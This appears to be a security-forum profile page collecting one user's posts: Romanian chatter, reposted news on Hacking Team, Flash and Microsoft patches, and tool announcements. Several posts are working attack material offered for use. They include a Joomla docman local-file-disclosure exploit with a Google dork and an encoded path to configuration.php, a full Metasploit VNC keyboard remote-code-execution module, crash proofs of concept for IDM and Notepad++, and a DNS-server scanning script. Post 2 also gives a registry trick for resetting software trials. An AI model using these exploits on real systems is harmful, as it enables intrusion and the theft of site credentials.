Jump to content

Aerosol

Active Members
  • Posts

    3453
  • Joined

  • Last visited

  • Days Won

    22

Everything posted by Aerosol

  1. Majoritatea programelor pe care am testat metoda ( avast, kaspersky, bitdefender, malwarebyte +++ ) de fiecare data am folosit ( Revo Uninstaller ) si apoi am sters din registrii si a functionat.
  2. Sunt doar 3 pasi pe care trebuie sa ii urmati. 1- dupa ce a expirat perioada de teste dezinstalati programul 2- Start -> search -> (tastati) regedit + ENTER ... HKEY_CURRENT_USER -> Software -> cautati folderul programului (ex: Avast Software) -> click dreapta -> delete 3- Reinstalati programul, alegeti varianta trial si aia e tot. P.S:// Aceasta metoda este perfect legala si poate fi folosita de oricate ori ai nevoie. Decat sa te complici cu crack-uri inutile mai bine iti sacrifici 10 minute din timp pentru a reinstala programul. Edit:// Posibil ca metoda sa nu functioneze pentru unele programe! Sursa: Aerosol @ Romanian Security Team.
  3. #!/usr/bin/env python # Title : Internet Download Manager - Crash Proof Of Concept # Affected Versions: All Version # Founder : InternetDownloadManager # Tested on Windows 7 / Server 2008 # # # Author : Mohammad Reza Espargham # Linkedin : https://ir.linkedin.com/in/rezasp # E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com # Website : www.reza.es # Twitter : https://twitter.com/rezesp # FaceBook : https://www.facebook.com/mohammadreza.espargham # # # downlWithIDM64.dll Exploit # # # 1 . run python code : python crash.py # 2 . open "IDM" # 3 . Tasks --> Import --> From IDM export file # 4 . select r3z4.ief # 5 . Crashed hdr = "<" #start syntax hcr = "ftp://" #pro crash = "\x41"*1992999 #B0F exp = hdr+hcr+crash+hdr+hcr+crash file = open("r3z4.ief", "w") file.write(exp) file.close() Source
  4. # Title: Notepad++ - Crash # Date: 10/07/2015 # Author: Rahul Pratap Singh (@0x62626262) # Vendor Homepage: https://notepad-plus-plus.org # Download: https://notepad-plus-plus.org/download/v6.7.3.html # Version: v6.7.3 # Tested on: Windows_XP_x86 & Windows_7_x86 Incorrect theme file parsing, that leads to crash. -Create a .xml file with numbereous "A" (around 1000) in it and save as test.xml -Go to this directory in windows "/appdata/roaming/notepad++/themes/" and paste above test.xml file in this theme folder and restart notepad++ -Now start notepad++ and in menu tab, go in settings and then select style configurator and now select test file in theme select option -Now hit "save and close" button, it will crash with an error message Thanks Rahul Pratap Singh Source
  5. Upgrade Workstation, Player and Horizon View client at your leisure, or risk internal attacks VMware's security SNAFU email list has delivered news of a new issue in VMware Workstation, Player and Horizon View Client. The missive says “VMware Workstation, Player and Horizon View Client for Windows do not set a discretionary access control list (DACL) for one of their processes. This may allow a local attacker to elevate their privileges and execute code in the security context of the affected process.” Allowing someone inside the firewall to do that doesn't sound like a good idea at all, so VMware has done the proper thing and coded fixes in the form of point upgrades to the affected products, namely Workstation 10.x and 11.x, Player 7.x and 6.x, plus Horizon View Client 5.x. The advisory's name is VMSA-2015-0005, with the latter quad indicating it is the fifth time this year VMware's had to make something right in a hurry. That's not a terrible record for a company with a decent portfolio of products, although the fact that three of the five impact Workstation may raise eyebrows. The good news for users of VMware's desktop hypervisor for Windows is that it looks to have a substantial refresh on the horizon (pardon the pun), or at least enough of a refresh to justify a change in naming convention. Source
  6. Whoops, sorry, did we not make that clear - Google Uninstalling the Google Photos app from your Android device will not safeguard your pictures from being slurped up by Google, it turns out. Picture Nashville Business Journal journo David Arnott's horror upon discovering that the advertising giant had been collecting private photographs he had taken of his wife and daughter. "The problem was," he wrote, "I'd deleted all of those pictures, and most distressing, I didn't even have the Google Photos app on my phone." Arnott, an assistant news editor at the NBJ, discovered that the uploading settings on the Google Photos app are linked to the separate Google Settings app on Android phones, rather than the settings of the native Photos app itself. All that has to be done to turn your Android device "into a stealth Google Photos uploader" is to "turn on the backup sync, then uninstall the app," Arnott writes. After reaching out to Google, and after reaching someone on the phone and describing the issue, Arnott was told to wait for a comment. "Several hours later, I received a terse email that said, 'The backup was as intended.' If I want to stop it from happening, I was told I'd have to change settings in Google Play Services." From sexting images, obtained by Google without users' knowledge - GCHQ style - through to just average passers by, captured in a photograph without their knowledge and subjected to Google's facial recognition technology, Arnott suggests there are plenty of details within this realm which are worthy of public concern. A spokesperson at Google told The Register: "Some users have uninstalled the Photos app on Android without realising backup as an Android service is still enabled. This is something we are committed to resolving. We are working to make the messaging clearer as well as provide users who uninstall the Photos app an easy way to also disable backup." "In the meantime, if you've deleted the Photos app and would like to turn off backup on your Android device, please go to Google Settings, select Google Photos backup and toggle the switch at the top to 'off.'" Source
  7. Adobe has promised to do it all can to improve the security of its much maligned Flash tool, in response to criticisms from the new chief security officer of Facebook and Mozilla blocking the tool from its Firefox browser. The company said in a blog post that it is working hard to fix problems that came to light after data was leaked from the server of Italian surveillance software firm Hacking Team. Adobe went on to say that Flash is widely used and is naturally a target for hackers, but that the firm is confident of maintaining an adequate level of security for the product. "Flash Player is one of the most ubiquitous and widely distributed pieces of software in the world and, as such, is a target of malicious hackers," the blog said. "We are actively working to improve Flash Player security and, as we did in this case, will work to quickly address issues when they are discovered." The comments come after Mozilla took the notable step of blocking Flash from its browser in light of security concerns that came to light in the past 10 days. Mark Schmidt, head of Firefox support at Mozilla, confirmed that all versions of Flash up to the most recent 18.0.0.203 release have been added to the official Mozilla blocklist. This came after incoming Facebook chief security officer Alex Stamos called for Adobe to announce an ‘end-of-life date’ for Flash given the problems it is causing. “Even if it's 18 months from now, one set date is the only way to disentangle the dependencies and upgrade the whole ecosystem at once,” he added. Adobe has issued two major updates for Flash since the flaws were revealed. The first patch fixed the CVE-2015-5119 vulnerability. The firm was soon forced to issue a second patch for two further flaws that were uncovered, termed CVE-2015-5122 and CVE-2015-5123, as explained in a post on its website. "Critical vulnerabilities have been identified in Adobe Flash Player 18.0.0.204 and earlier versions for Windows, Macintosh and Linux," it said. "Successful exploitation could cause a crash and potentially allow an attacker to take control of the affected system." Adobe rates the flaws as critical and firms have been urged to upgrade as soon as possible. The firm also thanked researchers at FireEye and Trend Micro for uncovering the vulnerabilities. The revelations are just the latest information to come to light since the Hacking Team breach. Other data revealed that the FBI is a customer of Hacking Team, and is reported to have spent $775,000 on the firm's software. The revelations from the hack have not come as a huge surprise to those who have criticised Hacking Team in the past, and the firm has been labelled an "enemy of the internet" by Reporters Without Borders. "Hacking Team describes its lawful interception products as 'offensive technology' and has been called into question over deliveries to Morocco and the United Arab Emirates," the organisation said. "The company’s 'Remote Control System', called DaVinci, is able, it says, to break encryption on emails, files and internet telephony protocols." The attackers behind the hack have not yet come to light, but they too were clearly keen to embarrass and discredit Hacking Team, not only releasing the data from its systems but defacing its Twitter account and posting company emails. The firm’s bio on Twitter was changed to read: 'Developing ineffective, easy-to-pwn offensive technology to compromise the operations of the worldwide law enforcement and intelligence communities.' The leaked information allegedly includes contracts the company signed with repressive governments such as in Sudan, Uzbekistan and Russia. Hacking Team had denied ever working with Sudan after a report in 2014 accused it of doing so. Source
  8. Data accidentally made public by Google has revealed that 95 percent of all requests for search results to be removed from its index under the Right to be Forgotten ruling have been made by ordinary people, not celebrities, MPs or criminals. The data, uncovered by The Guardian, is somewhat surprising, as one of the chief arguments made against the Right to be Forgotten is that it could be abused by those in high-profile positions to hide negative stories from their past. However, The Guardian uncovered information in the source code of Google’s Transparency Report showing that the vast majority of the 220,000 requests received up to March 2015 related to everyday people. “These include a woman whose name appeared in prominent news articles after her husband died, another seeking removal of her address, and an individual who contracted HIV a decade ago,” The Guardian reported. Google said that the information was test data being worked on as the company considers the possibility of providing more insight into the nature of the requests it has received. "We’ve always aimed to be as transparent as possible about our Right to be Forgotten decisions. The data The Guardian found was part of a test to figure out how we could best categorise requests," the firm said. "We discontinued that test in March because the data was not reliable enough for publication. We are, however, currently working on ways to improve our transparency reporting." Google has revealed that as of 14 July it has received 283,276 requests to take down information for over one million URLs. The Right to be Forgotten ruling has created much controversy, some arguing that it has effectively made Google the judge and jury when deciding who can have their information made private and who cannot. The BBC has already attempted to keep a list of all the URLs that Google has removed from its listings relating to the broadcaster to help people find out what is being removed. "The BBC has decided to make clear to licence fee payers which pages have been removed from Google's search results by publishing this list of links," wrote Neil McIntosh, managing editor at the BBC. Source
  9. Office desktops, RDP servers, Hyper-V systems, all hit Microsoft has released fixes for 59 CVE-listed vulnerabilities in its software – including a patch for the elevation-of-privilege flaw in Windows exploited by spyware maker Hacking Team. There's a patch (MS15-065) for a remote-code execution bug in Internet Explorer 11 on Windows 7 and 8.1 that also emerged from the Hacking Team leak. Someone tried to sell details of the hole to the Italian surveillance-ware maker, and although the company declined to buy an exploit, enough information was exchanged in the subsequently leaked emails to reveal the flaw. It's possible there are even more Hacking Team-linked vulnerabilities fixed in this month's Patch Tuesday batch. There's a remote-code execution hole in Redmond's RDP server on Windows 7 and 8, and Server 2012 and Server Core, and also one in SQL server. There's a Hyper-V guest escape. This Patch Tuesday has something for everyone: MS15-077: The Hacking Team elevation-of-privilege bug in the Windows Adobe Type Manager Font Driver that allows normal programs to gain administrator-level access. The flaw exists in Server 2003 and in Windows Vista and later for desktops and notebooks. The flaw is listed as "important," though the availability of exploit code in the wild should make patching a top priority. MS15-065: The usual IE patch, this time with 29 CVE-listed flaws in Internet Explorer, including remote code execution vulnerabilities. The bulletin is listed as a "critical" fix, and includes an update to address the other Hacking Team-related bug. MS15-066: A bulletin for remote-code execution in the VBScript Scripting Engine. The bulletin is listed as "critical" for Windows machines running IE 6, 7, and 8. Bo Qu of Palo Alto Networks was credited for discovery. MS15-067: A remote-code execution flaw in Remote Desktop Protocol servers running on Windows 7, Windows 8, Server 2012, and Server Core. The bulletin is rated as "critical" with no discovery credit given. MS15-068: Two CVE-listed remote-code execution vulnerabilities in Hyper-V for Windows Server 2008, Windows 8/8.1, Server 2012, and Server Core. An application running in a guest application can exploit this bug to run code on the host. Nightmare. The bulletin is listed as "critical," with discovery credit going to Microsoft's Thomas Garner. MS15-058: Remote-code execution flaws in SQL server. Listed as an "important" risk with no discovery credit given. MS15-069: A pair of remote-code execution vulnerabilities involving RTF and DLL files in Windows Server 2003 and 2012, and Windows Vista to Windows 8.1 RT. The bulletin is listed as "important," with discovery credit going to Haifei Li of McAfee Labs IPS Team and Ashutosh Mehra of HP Zero Day Initiative. MS15-070: An update for eight CVE-listed flaws in Microsoft Office 2007, 2010, 2013, and Office for Mac. The bulletin is listed as "important," although it is possible to exploit some of the bugs to execute arbitrary code on a vulnerable PC if a malicious Office files is opened. MS15-071: An elevation-of-privilege flaw in Netlogon for Windows Server 2003 and later. The bulletin is listed as "important." Discovery credit was not given. MS15-072: An elevation-of-privilege flaw in Windows Graphics Component for Windows Server 2003, 2008, 2012, and Server Core as well as Windows Vista, Windows 7, Windows 8, and Windows RT. The vulnerability is listed as "important" and discovery credit was given to Nicolas Joly. MS15-073: Six elevation-of-privilege and information disclosure flaws in the Windows kernel-mode driver for Windows Server 2003 and later and Windows Vista and later. The bulletin is listed as "important," with credit going to Nils Sommer of zytegeist and Matt Tait of Google Project Zero and enSilo. MS15-074: An elevation-of-privilege vulnerability in Windows Installer for Server 2003 and later, as well as Vista and later. The bulletin is listed as "important" with credit going to Mariusz Mlynsk of HP Zero Day Initiative. MS15-075: Two elevation-of-privilege flaws in Windows OLE for Server 2003 and later and Windows Vista and later. The flaw is listed as "important." Discovery credit was given to Nicolas Joly. MS15-076: Elevation-of-privilege flaw in systems after Windows Server 2003 and Windows Vista. The bulletin was listed as "important" with no discovery credit given. Get patching before hackers start exploiting them. It also the final Patch Tuesday for Server 2003. Along with the Microsoft updates, users and admins should also patch or disable Adobe Flash, Acrobat, Reader and Shockwave, as a fresh batch of security fixes are also available for the software today. Source
  10. Htcap is a web application analysis tool for detecting communications between javascript and the server. It crawls the target application and maps ajax calls, dynamically inserted scripts, websockets calls, dynamically loaded resources and some interesting elements. The generated report is meant to be a good starting point for a manual web application security audit. Htcap is written in python and uses phantomjs to load pages injecting a probe that analyzes javascript behaviour. Once injected, the probe, overrides native javascript methods in order to intercept communications and DOM changes. It also simulates user interaction by firing all attached events and by filling html inputs. Download
  11. Smalisca is a static code analysis tool for Smali files. Changes: Various updates. Download
  12. find_dns is a tool that scans networks looking for DNS servers. #!/usr/bin/env python2 # # ./find_dns.py -l IPs.txt -t 500 -o dnsservers.txt # # dns-server finder by dash # # #./find_dns.py -l rIP.txt -t 100 #[*] Found 1001 entries #[*] Entries 1001 in queue #[*] Running with 100 threads #================================================== #IP NAME #================================================== #91.x.x.x (x.info) #191.x.x.x (191.x.br) #67.x.x.x (name.info) #================================================== #[*] Done # import os import sys import time import Queue import struct import socket import random import argparse import threading global rQ rQ = Queue.Queue() def openFile(hostList): fr = open(hostList,'r') rBuf = fr.readlines() return rBuf def openWriteFile(outfile): fw = open(outfile,'wb') return fw def parseDomain(domain): do = domain.split('.') if len(do) != 2: print '[!] Sorry, unknown domain type: %s\nExample:google.com' % (domain) return False tld = do[1] tld_len = struct.pack('>B', len(tld)) tld_sub = do[0] tld_sub_len = struct.pack('>B', len(tld_sub)) dom_pay = '%c%s%c%s' % (tld_sub_len,tld_sub,tld_len,tld) return dom_pay def checkDNS(payload,host,resolv,debug,version): # settimeout so recv is not block rBuf_len = -1 try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.settimeout(5) s.connect((host,53)) s.send(payload) rBuf = s.recv(1024) rBuf_len = len(rBuf) name = '' # default we resolve IPs as long as -n is not choosen if resolv: try: name = socket.gethostbyaddr(host)[0] except socket.herror,e: pass if version: # FEFE packet! ver_req = '\xfe\xfe\x01 \x00\x01\x00\x00\x00\x00\x00\x01\x07version\x04bind\x00\x00\x10\x00\x03\x00\x00)\x10\x00\x00\x00\x00\x00\x00\x00' try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.settimeout(3) s.connect((host,53)) s.send(ver_req) vBuf = s.recv(1024) except socket.error,e: vBuf = '' pass if name == '': if debug: print '%s\t%d\t%s\t%s' % (host,rBuf_len,repr(rBuf),repr(vBuf)) data = '%s\t%d\t%s\t%s\n' % (host,rBuf_len,repr(rBuf),repr(vBuf)) else: print '%s\t%d' % (host,rBuf_len) data = '%s\t%d\n' % (host,rBuf_len) else: if debug: print '%s\t(%s) %d\t%s' % (host,name,rBuf_len,repr(rBuf)) data = '%s\t(%s) %d\t%s\n' % (host,name,rBuf_len,repr(rBuf)) else: print '%s\t(%s) %d' % (host,name,rBuf_len) data = '%s\t(%s) %d\n' % (host,name,rBuf_len) rQ.put(data) except socket.error,e: # print e pass return def run(args): """ mighty mighty function """ if not args.thrCnt: thrCnt=50 else: thrCnt = int(args.thrCnt) if args.outfile: fw = openWriteFile(args.outfile) dom_pay = parseDomain(args.domain) payload = 'J\x8e\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00%s\x00\x00\x01\x00\x01' % (dom_pay) hostList = args.hostList q = Queue.Queue() rBuf = openFile(hostList) print '[*] Found %d entries' % len(rBuf) for r in rBuf: r = r.rstrip('\n') r = r.rstrip('\r') q.put(r) print '[*] Entries %d in queue' % q.qsize() print '[*] Running with %d threads' % thrCnt print '='*50 if args.resolv: print 'IP\t\tNAME\tPAYLEN' else: print 'IP\t\tPAYLEN' print '='*50 thrList = [] org_qlen = float(q.qsize()) while True: #TODO percents calc #qlen = q.qsize() #cur_cnt = (qlen / org_qlen) * 100 #cur_cnt = int(100 - cur_cnt) #if cur_cnt % 5 == 0 and cur_cnt != 0: #print '='*20+' %d ' % (cur_cnt)+'='*20 if len(thrList) < thrCnt and q.qsize()>0: # enable random transaction ids if args.randTrans: rd = random.randint(0,65535) rd_pack = struct.pack('>H',rd) payload = '%s%s' % (rd_pack,payload[2:]) thrDns = threading.Thread(target = checkDNS, args = (payload,q.get(),args.resolv,args.debug,args.version)) thrDns.daemon = True thrDns.start() thrList.append(thrDns) for entry in thrList: if entry.isAlive()==False: entry.join() thrList.remove(entry) if args.outfile and rQ.qsize()>0: i = rQ.get() data = "%s" % (i) fw.write(data) fw.flush() else: if rQ.qsize()>0: rQ.get() if q.qsize()==0 and len(thrList) == 0: break if args.outfile: fw.close() print '='*50 print '[*] Done' print '='*50 def main(): parser_desc = 'dns server finder, by dash' prog_desc = 'find_dns.py' parser = argparse.ArgumentParser( prog = prog_desc, description = parser_desc) parser.add_argument("-l",action='store',required=True,help='host list with ips',dest='hostList') parser.add_argument('-t',action='store',required=False,help='thread count', dest='thrCnt') parser.add_argument('-o',action='store',required=False,help='write found data to file', dest='outfile') parser.add_argument('-n',action='store_false',default=True,required=False,help='do not resolve ips', dest='resolv') parser.add_argument('-d',action='store',default='google.com',required=False,help='choose the domain for the dns request', dest='domain') parser.add_argument('-r',action='store_false',default=True,required=False,help='deactivate random transaction ids', dest='randTrans') parser.add_argument('-v',action='store_true',default=False,required=False,help='grab version from dns server enable debug mode for it! (experimental!)', dest='version') parser.add_argument('-V',action='store_true',default=False,required=False,help='print version information', dest='versinfo') parser.add_argument('--debug',action='store_true',default=False,required=False,help='debug output', dest='debug') args = parser.parse_args() # add some more info here sometime if args.versinfo: print desc sys.exit(23) run(args) if __name__ == "__main__": main() Source
  13. AESshell is a backconnect shell for Windows and Unix written in python and uses AES in CBC mode in conjunction with HMAC-SHA256 for secure transport. Written in python but also includes a Windows binary. Download
  14. This module, once loaded, gives the thread/user calling it root instantly without spawning an extra shell. Download
  15. # Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI) # CWE: CWE-200(FPD) CWE-98(LFI/LFD) # Risk: High # Author: Hugo Santiago dos Santos # Contact: hugo.s@linuxmail.org # Date: 13/07/2015 # Vendor Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman # Google Dork: inurl:"/components/com_docman/dl2.php" # Xploit (FPD): Get one target and just download with blank parameter: http://www.site.com/components/com_docman/dl2.php?archive=0&file= In title will occur Full Path Disclosure of server. # Xploit (LFD/LFI): http://www.site.com/components/com_docman/dl2.php?archive=0&file=[LDF] Let's Xploit... First we need use Xploit FPD to see the path of target, after that we'll Insert 'configuration.php' configuration database file and encode in Base64: ../../../../../../../target/www/configuration.php <= Not Ready http://www.site.com/components/com_docman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA== <= Ready ! And Now we have a configuration file... Source
  16. Daca tot nu imi raspunde nimeni din staff sa dea careva TC. Off:// I'm back haters. din cauza unor ratati ce si-au pierdut timpul sa bage botii de dislike pe forum. Edit::// numai ieri am primit de la un bot 365 dislike-uri.
  17. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex/proto/rfb' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking WINDOWS_KEY = "\xff\xeb" ENTER_KEY = "\xff\x0d" include Msf::Exploit::Remote::Tcp include Msf::Exploit::CmdStager include Msf::Exploit::Powershell def initialize(info = {}) super(update_info(info, 'Name' => 'VNC Keyboard Remote Code Execution', 'Description' => %q{ This module exploits VNC servers by sending virtual keyboard keys and executing a payload. On Windows systems a command prompt is opened and a PowerShell or CMDStager payload is typed and executed. On Unix/Linux systems a xterm terminal is opened and a payload is typed and executed. }, 'Author' => [ 'xistence <xistence[at]0x90.nl>' ], 'Privileged' => false, 'License' => MSF_LICENSE, 'Platform' => %w{ win unix }, 'Targets' => [ [ 'VNC Windows / Powershell', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ], [ 'VNC Windows / VBScript CMDStager', { 'Platform' => 'win' } ], [ 'VNC Linux / Unix', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ] ], 'References' => [ [ 'URL', 'http://www.jedi.be/blog/2010/08/29/sending-keystrokes-to-your-virtual-machines-using-X-vnc-rdp-or-native/'] ], 'DisclosureDate' => 'Jul 10 2015', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(5900), OptString.new('PASSWORD', [ false, 'The VNC password']), OptInt.new('TIME_WAIT', [ true, 'Time to wait for payload to be executed', 20]) ], self.class) end def press_key(key) keyboard_key = "\x04\x01" # Press key keyboard_key << "\x00\x00\x00\x00" # Unknown / Unused data keyboard_key << key # The keyboard key # Press the keyboard key. Note: No receive is done as everything is sent in one long data stream sock.put(keyboard_key) end def release_key(key) keyboard_key = "\x04\x00" # Release key keyboard_key << "\x00\x00\x00\x00" # Unknown / Unused data keyboard_key << key # The keyboard key # Release the keyboard key. Note: No receive is done as everything is sent in one long data stream sock.put(keyboard_key) end def exec_command(command) values = command.chars.to_a values.each do |value| press_key("\x00#{value}") release_key("\x00#{value}") end press_key(ENTER_KEY) end def start_cmd_prompt print_status("#{rhost}:#{rport} - Opening Run command") # Pressing and holding windows key for 1 second press_key(WINDOWS_KEY) Rex.select(nil, nil, nil, 1) # Press the "r" key press_key("\x00r") # Now we can release both keys again release_key("\x00r") release_key(WINDOWS_KEY) # Wait a second to open run command window select(nil, nil, nil, 1) exec_command('cmd.exe') # Wait a second for cmd.exe prompt to open Rex.select(nil, nil, nil, 1) end def exploit begin alt_key = "\xff\xe9" f2_key = "\xff\xbf" password = datastore['PASSWORD'] connect vnc = Rex::Proto::RFB::Client.new(sock, :allow_none => false) unless vnc.handshake fail_with(Failure::Unknown, "#{rhost}:#{rport} - VNC Handshake failed: #{vnc.error}") end if password.nil? print_status("#{rhost}:#{rport} - Bypass authentication") # The following byte is sent in case the VNC server end doesn't require authentication (empty password) sock.put("\x10") else print_status("#{rhost}:#{rport} - Trying to authenticate against VNC server") if vnc.authenticate(password) print_status("#{rhost}:#{rport} - Authenticated") else fail_with(Failure::NoAccess, "#{rhost}:#{rport} - VNC Authentication failed: #{vnc.error}") end end # Send shared desktop unless vnc.send_client_init fail_with(Failure::Unknown, "#{rhost}:#{rport} - VNC client init failed: #{vnc.error}") end if target.name =~ /VBScript CMDStager/ start_cmd_prompt print_status("#{rhost}:#{rport} - Typing and executing payload") execute_cmdstager({:flavor => :vbs, :linemax => 8100}) # Exit the CMD prompt exec_command('exit') elsif target.name =~ /Powershell/ start_cmd_prompt print_status("#{rhost}:#{rport} - Typing and executing payload") command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true, encode_final_payload: true}) # Execute powershell payload and make sure we exit our CMD prompt exec_command("#{command} && exit") elsif target.name =~ /Linux/ print_status("#{rhost}:#{rport} - Opening 'Run Application'") # Press the ALT key and hold it for a second press_key(alt_key) Rex.select(nil, nil, nil, 1) # Press F2 to start up "Run application" press_key(f2_key) # Release ALT + F2 release_key(alt_key) release_key(f2_key) # Wait a second for "Run application" to start Rex.select(nil, nil, nil, 1) # Start a xterm window print_status("#{rhost}:#{rport} - Opening xterm") exec_command('xterm') # Wait a second for "xterm" to start Rex.select(nil, nil, nil, 1) # Execute our payload and exit (close) the xterm window print_status("#{rhost}:#{rport} - Typing and executing payload") exec_command("nohup #{payload.encoded} &") exec_command('exit') end print_status("#{rhost}:#{rport} - Waiting for session...") (datastore['TIME_WAIT']).times do Rex.sleep(1) # Success! session is here! break if session_created? end rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{e.message}") ensure disconnect end end def execute_command(cmd, opts = {}) exec_command(cmd) end end Source
  18. 19 @askwrite mai baga o fisa, e ziua in care m-am nascut.
  19. Imi face deosebita placere sa vad hateri ca tine cum comenteaza, vreau sa te anunt ca pe vremea aia aveam 12/13 ani si nu a zis nimeni ca stiam prea multe, dar hai sa te sustinem, e la moda sa comentezi aiurea mai ales ca se promoveaza ,, atacul intre useri " sper ca a inteles persoana la care fac referire. Hai gata ca nu am chef si nici timp de copilarii inutile, fie ca voi.
  20. Totusi exista o limita, cum a spus si Zatarra ( cred ca el, nu sunt sigur ) cu ceva timp in urma ,, daca s-a ajuns sa fi nevoit sa dai ignore moderatorilor e grav "
  21. Eu chiar am iubit si inca iubesc RST-ul, cu bune si cu rele, aici am invatat foarte multe , da poate majoritatea nu ma plac, poate am fost injurat si atacat de ,,n" ori dar ati putea lua un singur lucru de la mine ( devotamentul ) eu sunt pe RST pentru a ajuta, pentru a incerca sa fac ceva pentru acest forum cum si acest forum a facut pentru mine. Lasand toata caterinca si rahatul de-o parte. Mai toti ati uitat cel mai important lucru, iubirea fata de acest forum... Nu spun ca nu am facut greseli, toti facem dar in loc sa ne atacam intre noi mai bine ne-am respecta...
  22. Inteleg perfect ce zici spiri, tuturor ne este dor de acele vremuri dar un lucru stiu sigur, acele vremuri sunt trecute. Acum daca faci o greseala de exprimare esti injurat si luat la p..., daca faci o greseala la fel, mare pacat! @Zatarra de fiecare data cand am incercat sa fac ceva si nu numai eu majoritatea a iesit fix....De ce? Fiindca unii se cred prea buni, superiori si nu isi incap in piele de mandrii ce sunt.
  23. Aerosol

    Fun stuff

    @CM3D next level, ce sa stie unul ca mine...
  24. Domeniul rstforums.com a fost sechestrat de catre autoritati? | Cik.Ro – Adrian Tanase Blog RSTFORUMS hacked? | RoForum.Net serialepenet.ro inchis de autoritati - ArenaWeb no coment ) :/
×
×
  • Create New...